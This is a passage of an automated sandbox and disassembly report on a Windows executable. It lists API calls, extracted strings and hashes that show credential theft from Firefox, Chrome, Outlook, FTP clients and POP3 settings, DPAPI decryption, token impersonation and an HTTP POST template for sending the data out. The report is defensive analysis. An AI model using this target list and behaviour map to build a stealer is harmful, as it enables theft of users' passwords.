                  • Instruction Fuzzy Hash: F291F670904109EADF21AFA1DD46BAEBEB5AF04308F20403BF501751E2D7BE4E959B59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins$ftp.$ftp://$http://$https://$mozsqlite3.dll$sqlite3.dll
                  • API String ID: 0-3560805513
                  • Opcode ID: 545cff59d4eda7f766d5b0df4497bf5a85fcbd4fc8714724cf6a74084cb58ec7
                  • Instruction ID: e95dfbb8d8d990a8ab6e0530343e41f76290cb4ce0cde13c720cf05920f077ce
                  • Opcode Fuzzy Hash: 545cff59d4eda7f766d5b0df4497bf5a85fcbd4fc8714724cf6a74084cb58ec7
                  • Instruction Fuzzy Hash: 13511470940109BADF11ABA1CE06AEE7E75AF14309F10443BF541B01E2DBBD4AA1DB5D
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • wsprintfA.USER32 ref: 0040A88C
                  • wsprintfA.USER32 ref: 0040A89F
                  • wsprintfA.USER32 ref: 0040A8B2
                  • wsprintfA.USER32 ref: 0040A8C5
                  • wsprintfA.USER32 ref: 0040A8D8
                  • wsprintfA.USER32 ref: 0040A8EB
                  • wsprintfA.USER32 ref: 0040A8FE
                    • Part of subcall function 0040A706: lstrlen.KERNEL32(?), ref: 0040A71B
                    • Part of subcall function 0040A706: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A7D3
                    • Part of subcall function 0040A706: LocalFree.KERNEL32(00000000), ref: 0040A806
                    • Part of subcall function 00401548: lstrlen.KERNEL32(00000000), ref: 00401554
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: wsprintf$Locallstrlen$AllocCryptDataFreeUnprotect
                  • String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
                  • API String ID: 3846021373-1012938452
                  • Opcode ID: 2526abd854f4923f605afca51e82ce3a5495784b67bfd747cbcfbb8de1c7722a
                  • Instruction ID: dc9777ff7e0b01a33503325bf57cf66e7db019083ebb8df2e8b3fd290b5606e8
                  • Opcode Fuzzy Hash: 2526abd854f4923f605afca51e82ce3a5495784b67bfd747cbcfbb8de1c7722a
                  • Instruction Fuzzy Hash: D1617371940208FBDF527FA1DD42AEDBB72AF04708F14803AF611351B2DB7A5A60EB59
                  APIs
                    • Part of subcall function 00409E8B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409EC4
                    • Part of subcall function 00409E8B: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409ECD
                    • Part of subcall function 00409ED6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F12
                    • Part of subcall function 00409ED6: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F1B
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F170
                  • lstrcmpiA.KERNEL32(?,identification), ref: 0040F1F0
                  • lstrcmpiA.KERNEL32(?,identitymgr), ref: 0040F205
                  • lstrcmpiA.KERNEL32(?,inetcomm server passwords), ref: 0040F228
                  • lstrcmpiA.KERNEL32(?,outlook account manager passwords), ref: 0040F247
                  • lstrcmpiA.KERNEL32(?,identities), ref: 0040F266
                  • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F2C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                  • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                  • API String ID: 636431001-4287852900
                  • Opcode ID: bb333d8fbd1e7255a575d737b61fc163956e0edd29ac13a13b9663bcba2d83ed
                  • Instruction ID: 0e22ab3b2dc57d385f5d98c67c41156d2e2fceceff404690329680ab2f3ee2d4
                  • Opcode Fuzzy Hash: bb333d8fbd1e7255a575d737b61fc163956e0edd29ac13a13b9663bcba2d83ed
                  • Instruction Fuzzy Hash: 47413D3584021DEAEF219F91CD41FDA7B79BB09304F0041EAB608B5092DB799AD9DF94
                  APIs
                  • StrStrIA.SHLWAPI(?,explorer.exe,00000002,00000000), ref: 00402B50
                  • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,explorer.exe,00000002,00000000), ref: 00402B74
                  • OpenProcess.KERNEL32(02000000,00000000,?), ref: 00402B9E
                  • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 00402BB6
                  • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 00402BC3
                  • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 00402BE4
                  • CloseHandle.KERNEL32(?), ref: 00402C09
                  • CloseHandle.KERNEL32(?,?), ref: 00402C11
                  • CloseHandle.KERNEL32(?), ref: 00402C1B
                  • Process32Next.KERNEL32(?,00000128), ref: 00402C2D
                  • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00402C3D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$OpenProcess$User$CurrentImpersonateLoggedNextProcess32SessionToken
                  • String ID: explorer.exe
                  • API String ID: 3144406365-3187896405
                  • Opcode ID: 3322303f64adb676d8db25f6ed76fe5f098889783615bc13d16c4bcdfa4f3e92
                  • Instruction ID: 5723e61b88d4e9f9222964c16d2d2afb6602735196ba38223fd4c3419d9b93c0
                  • Opcode Fuzzy Hash: 3322303f64adb676d8db25f6ed76fe5f098889783615bc13d16c4bcdfa4f3e92
                  • Instruction Fuzzy Hash: 27214230A14118ABEF229B51DE49BEEBBB4BB14344F1044B7E204F11E0DBB89E84DF59
                  APIs
                    • Part of subcall function 004026D3: lstrlen.KERNEL32(?), ref: 00402707
                  • StrStrIA.SHLWAPI(?,004133CD), ref: 0040B632
                  • lstrcmpiA.KERNEL32(CONSTRAINT,?), ref: 0040B654
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcmpilstrlen
                  • String ID: CONSTRAINT$origin_url$password_value$username_value
                  • API String ID: 3649823140-2401479949
                  • Opcode ID: 83092cc97906ed6b200ae337b8dc46f63c20743d4bbdfc852c011f4a0e956700
                  • Instruction ID: 9c5d8a244427796840b79d864bce391278a18baf4e7973b846767f3050b87988
                  • Opcode Fuzzy Hash: 83092cc97906ed6b200ae337b8dc46f63c20743d4bbdfc852c011f4a0e956700
                  • Instruction Fuzzy Hash: D3110035610009A6CF112F25EC01DDE3F61AB65398B008537F845A82A1E7BE89E5978D
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403A75
                  • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403AA0
                  • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403AE6
                  • wsprintfA.USER32 ref: 00403B0B
                    • Part of subcall function 004039D4: 72A313D0.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 004039F9
                  • lstrlen.KERNEL32(?,00001000,00001000,00001000), ref: 00403B36
                  • closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403B81
                  Strings
                  • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403B03
                  • <, xrefs: 00403AC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$Crack$A313AllocCreateLocalclosesocketlstrlenwsprintf
                  • String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                  • API String ID: 118042637-2005047030
                  • Opcode ID: 87abe820bb0d6036ffe2e3babf49ec09694a1781688e39f6c4ff6adf4ca460de
                  • Instruction ID: 1de9cb80474df7d9d3716ce442e77a1af239618b76ab67b58deaa212d5e7e0f6
                  • Opcode Fuzzy Hash: 87abe820bb0d6036ffe2e3babf49ec09694a1781688e39f6c4ff6adf4ca460de
                  • Instruction Fuzzy Hash: 3641A671D00209EADF11AFE1DC41BEEBFB9AF04349F10403AF510B51A2DBB96A55DB19
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: IsRelative$Path$Profile$profiles.ini
                  • API String ID: 0-4107377610
                  • Opcode ID: 737542b6f8ea86c960c44e09380ca456abda41aea68274e537a4f94da42fe37e
                  • Instruction ID: 95d3b633096284f4bbd09f7529df532e569788953b1a2b841014d990d7b74c68
                  • Opcode Fuzzy Hash: 737542b6f8ea86c960c44e09380ca456abda41aea68274e537a4f94da42fe37e
                  • Instruction Fuzzy Hash: 7441383591014AFADF122FA19C42EAE7F72AF40344F14457BB510B51F2D7BA4DA1AB08
                  APIs
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  • StrStrIA.SHLWAPI(?,Content-Length:), ref: 004038D5
                  • lstrlen.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 004038E6
                  • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403907
                  • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 0040391E
                  • lstrlen.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 0040392F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$AllocLocal
                  • String ID: Content-Length:$Location:
                  • API String ID: 2140729754-2400408565
                  • Opcode ID: 34bf45d2ae5e5f4909a357a932ac428661d7f98a5949df93852985c7b08e6a42
                  • Instruction ID: 83ca887fabee062547b53eafaae993b34422474f705763326791051a1ec7c268
                  • Opcode Fuzzy Hash: 34bf45d2ae5e5f4909a357a932ac428661d7f98a5949df93852985c7b08e6a42
                  • Instruction Fuzzy Hash: 2141C375A04209BBDB10AFA5CC41B9EFF79EF41304F208177F610B62E1DBB98A519B58
                  APIs
                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404095
                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 004040AD
                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004040BE
                  • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004040CD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$CurrentHandleModuleProcess
                  • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                  • API String ID: 977827838-3073145729
                  • Opcode ID: 4fcdc282f5bffe635abf6e5282685a6b48bb5cded201efcccefc7716ffc6b61f
                  • Instruction ID: 0c0e3d299907b3ee1aff85cb762b2a3139cf97807ba38a296252d8d46407c7e6
                  • Opcode Fuzzy Hash: 4fcdc282f5bffe635abf6e5282685a6b48bb5cded201efcccefc7716ffc6b61f
                  • Instruction Fuzzy Hash: 2DF05B7570020472C72066F66C46BDB2A9C8784399F140837B301F21C1E9FDCEC18268
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: <setting name="$value="
                  • API String ID: 0-3468128162
                  • Opcode ID: d66ce80f9a1f7a768bb22e3579432f9b56c9652e4afbe16f7a293e4c445b665b
                  • Instruction ID: c33e9c415a64bff515884bf69f9fec0b61441930a1e01253635b8b034e8d7c01
                  • Opcode Fuzzy Hash: d66ce80f9a1f7a768bb22e3579432f9b56c9652e4afbe16f7a293e4c445b665b
                  • Instruction Fuzzy Hash: 9E319231D04159AACB11AFE58C42AFEBFF59F19318F144077F800B3291E27D5E849BAA
                  APIs
                  • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401DF3
                  • GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E00
                  • CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00401E14
                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E29
                  • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E38
                  • CloseHandle.KERNEL32(?,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E3F
                  • CloseHandle.KERNEL32(?,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00401E4E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseFileHandle$CreateExitMappingProcessSizeView
                  • String ID:
                  • API String ID: 3150701006-0
                  • Opcode ID: 949d4fb8c32c1c300465c7b7006e2c22f1bc7f796e9aa28519f762924f610864
                  • Instruction ID: 85007cd7ea39287834dcbb019f2643e60f627f5ec5cda8a57e9b5bd1c9afc158
                  • Opcode Fuzzy Hash: 949d4fb8c32c1c300465c7b7006e2c22f1bc7f796e9aa28519f762924f610864
                  • Instruction Fuzzy Hash: 17115270280311B6EB312F31CC83F493A989B02B58F208577B710BE1E6D6F9A840969C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ftp://$http://$https://
                  • API String ID: 0-2804853444
                  • Opcode ID: 824bf21748527ccf0ee5e405d558aa0ac1a34ce766c71e19e7ed342020c2d771
                  • Instruction ID: f252357bb19d0abd475bfb71269b74c2bf29c34e724c4a7a1edd31d425671f1d
                  • Opcode Fuzzy Hash: 824bf21748527ccf0ee5e405d558aa0ac1a34ce766c71e19e7ed342020c2d771
                  • Instruction Fuzzy Hash: DB61F531800109FEDF11AF91CD41AEEBBB9EF50348F00807AB945B51A1DB7A8B95DB98
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "/>$winex="
                  • API String ID: 0-1498080979
                  • Opcode ID: 3eb132c7603cfba6daa0d9d8a7b522bd3bd9872680de231d3961a307f8acaa4d
                  • Instruction ID: 9434819f4bc3329f6bcbf48870171796baa6cf8dabf0d126b8c2ebfbf643848a
                  • Opcode Fuzzy Hash: 3eb132c7603cfba6daa0d9d8a7b522bd3bd9872680de231d3961a307f8acaa4d
                  • Instruction Fuzzy Hash: 94313B31D04109BACF12ABE1CC029EE7E76AF54348F104037F501B61B2D77E8A55EBA9
                  APIs
                  • StrStrIA.SHLWAPI(007200D8,FTPCON), ref: 00407D7D
                  • StrStrIA.SHLWAPI(007203F8,FTP CONTROL,00000000,007200D8,FTPCON), ref: 00407D89
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                  • API String ID: 0-2908215140
                  • Opcode ID: 3ee4422c411aad379d804a98dde5ede144b823e812d4c7972b1e98bbef3f28bc
                  • Instruction ID: 3a587dd68ddc132e3d47e9ae6ef5358798d7162d4954e74c56b0eb14a8e86de6
                  • Opcode Fuzzy Hash: 3ee4422c411aad379d804a98dde5ede144b823e812d4c7972b1e98bbef3f28bc
                  • Instruction Fuzzy Hash: 6501D23090410579DB112B318D02FBF3E199F41714F24403BB551B22E3E6BC6A92929E
                  APIs
                  • GetHGlobalFromStream.OLE32(?,?,0040F6E3), ref: 0040F6F3
                  • GlobalLock.KERNEL32(?), ref: 0040F714
                  • GlobalUnlock.KERNEL32(?), ref: 0040F72C
                  • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040F6E3), ref: 0040F747
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: Global$FromLockStreamUnlock
                  • String ID: STATUS-IMPORT-OK
                  • API String ID: 2287449323-1591331578
                  • Opcode ID: b6e8bdff3ff7926463861a998b6e19064833c0d612ea786073f2b4296815f8bd
                  • Instruction ID: 60fd6dd111938d6d038ff2f74b19831a1621e6a5a019240cec079445e7f13ed7
                  • Opcode Fuzzy Hash: b6e8bdff3ff7926463861a998b6e19064833c0d612ea786073f2b4296815f8bd
                  • Instruction Fuzzy Hash: 4B016135D04209BBCF112BA2CC829AD7F29AB01348F1041B7B450B65F2DABE9E559B19
                  APIs
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(?), ref: 00401BEE
                    • Part of subcall function 00401BCD: lstrlen.KERNEL32(00000000,?), ref: 00401BF8
                    • Part of subcall function 00401BCD: lstrcpy.KERNEL32(00000000,?), ref: 00401C0C
                    • Part of subcall function 00401BCD: lstrcat.KERNEL32(00000000,00000000), ref: 00401C15
                  • lstrlen.KERNEL32(?), ref: 00402214
                  • StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                  • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                  • lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$lstrcatlstrcpy
                  • String ID: .exe
                  • API String ID: 2414487701-4119554291
                  • Opcode ID: 7e258b6c382b1638d522e4589bc77b8835f56ee84e5359e788166243c081256f
                  • Instruction ID: 20fea0f44eef862f296ac9e4666e5c2a0ca91eb8a47988185cb6541b9d05db6f
                  • Opcode Fuzzy Hash: 7e258b6c382b1638d522e4589bc77b8835f56ee84e5359e788166243c081256f
                  • Instruction Fuzzy Hash: 92F0AF3160428679DB3272A58C09F6F7E959B83740F2440BBF100AA2D2E7FD984293AD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: <POP3_Password2
                  • API String ID: 0-2923094552
                  • Opcode ID: b2ededce397b26cab0af6121c7eeb62d9f65699bf69da15e4c12fc532cd8696e
                  • Instruction ID: 3dcf51a08c645b7b89c7da5a563217d878ff6c10a32c66723cc5229c5e5481ec
                  • Opcode Fuzzy Hash: b2ededce397b26cab0af6121c7eeb62d9f65699bf69da15e4c12fc532cd8696e
                  • Instruction Fuzzy Hash: 32412D31D00009EECF12ABA2CD018EEBEB5AF54354F14447BF901B61B1D77A8E61AB69
                  APIs
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040C97D
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040C9A3
                  • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040C9C7
                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040C9E9
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040C9D4
                    • Part of subcall function 00401769: LocalAlloc.KERNEL32(00000040,00402200,?,00402280,?), ref: 00401777
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                  • String ID:
                  • API String ID: 1890766102-0
                  • Opcode ID: f09f4bcb1ad51d1da0f405e5d6498c58e5f48926fb0290af68c89bb95b306185
                  • Instruction ID: a379617581106fd5fb9413f6ad87db1a18af527bc8f1d65a3274682b4803367b
                  • Opcode Fuzzy Hash: f09f4bcb1ad51d1da0f405e5d6498c58e5f48926fb0290af68c89bb95b306185
                  • Instruction Fuzzy Hash: 55218E70A00208FEEF21ABE1CC42F9E7F68AB04744F20406BF100BA1E1D7BD5A409B18
                  APIs
                  • StrStrIA.SHLWAPI(007203F8,FTP Navigator), ref: 0040580B
                  • StrStrIA.SHLWAPI(007203F8,FTP Commander,007203F8,FTP Navigator), ref: 00405839
                    • Part of subcall function 00402200: lstrlen.KERNEL32(?), ref: 00402214
                    • Part of subcall function 00402200: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 00402233
                    • Part of subcall function 00402200: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402245
                    • Part of subcall function 00402200: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402257
                    • Part of subcall function 00401752: LocalFree.KERNEL32(00000000,?,004022A7,?,?,?,?,?,?), ref: 0040175E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2033101297.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2033078812.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_2qsdqACnX3.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$FreeLocal
                  • String ID: FTP Commander$FTP Navigator$ftplist.txt
                  • API String ID: 1884169789-2424314702
                  • Opcode ID: 06f67a4a0e3afc5c5b97338d1b9377692534aeb4b7779063e44e602c447dc653
